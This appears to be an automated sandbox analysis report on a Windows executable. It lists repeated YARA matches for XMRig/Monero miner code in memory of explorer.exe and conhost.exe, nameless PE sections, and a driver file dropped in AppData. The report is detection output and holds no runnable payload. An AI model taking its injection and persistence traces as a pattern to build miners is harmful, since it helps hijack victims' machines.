Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
PE file has nameless sections
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCCE8 0_3_026BCCE8
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCCE1 0_3_026BCCE1
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCCF7 0_3_026BCCF7
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCCCE 0_3_026BCCCE
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCCBF 0_3_026BCCBF
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCD6C 0_3_026BCD6C
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCD4D 0_3_026BCD4D
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCD5C 0_3_026BCD5C
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCD34 0_3_026BCD34
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BCD1F 0_3_026BCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_0564EC28 1_2_0564EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_0569FA96 9_2_0569FA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_0569B6F4 9_2_0569B6F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_0569DFC0 9_2_0569DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_0569DFB0 9_2_0569DFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097FD2B8 9_2_097FD2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F64F4 9_2_097F64F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F6E57 9_2_097F6E57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F6EA0 9_2_097F6EA0
Source: C:\Windows\System32\conhost.exe Code function: 11_2_000001B0F39CE2D6 11_2_000001B0F39CE2D6
Source: C:\Windows\System32\conhost.exe Code function: 11_2_000001B0F39CDF06 11_2_000001B0F39CDF06
Source: C:\Windows\System32\conhost.exe Code function: 11_2_000001B0F39CEB6A 11_2_000001B0F39CEB6A
Source: C:\Windows\System32\conhost.exe Code function: 11_2_000001B0F39CD2D2 11_2_000001B0F39CD2D2
Source: C:\Windows\System32\conhost.exe Code function: 11_2_000001B0F39CE70E 11_2_000001B0F39CE70E
Source: C:\Windows\System32\conhost.exe Code function: 11_2_00007FFA36265E22 11_2_00007FFA36265E22
Source: C:\Windows\System32\conhost.exe Code function: 11_2_00007FFA36265076 11_2_00007FFA36265076
Source: C:\Windows\System32\conhost.exe Code function: 11_2_00007FFA3626044A 11_2_00007FFA3626044A
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00000201F218DF06 17_2_00000201F218DF06
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00000201F218E2D6 17_2_00000201F218E2D6
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00000201F218EB6A 17_2_00000201F218EB6A
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00000201F218E70E 17_2_00000201F218E70E
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00000201F218D2D2 17_2_00000201F218D2D2
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA36250330 17_2_00007FFA36250330
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA362567BC 17_2_00007FFA362567BC
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA36255E22 17_2_00007FFA36255E22
Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA36255076 17_2_00007FFA36255076
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000224D5B4E2D6 21_2_00000224D5B4E2D6
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000224D5B4DF06 21_2_00000224D5B4DF06
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000224D5B4D2D2 21_2_00000224D5B4D2D2
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000224D5B4E70E 21_2_00000224D5B4E70E
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000224D5B4EB6A 21_2_00000224D5B4EB6A
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA362666FD 21_2_00007FFA362666FD
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA36265E22 21_2_00007FFA36265E22
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA36265076 21_2_00007FFA36265076
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA3626044A 21_2_00007FFA3626044A
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA36268BBE 21_2_00007FFA36268BBE
Creates driver files
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Uses 32bit PE files
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Yara signature match
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
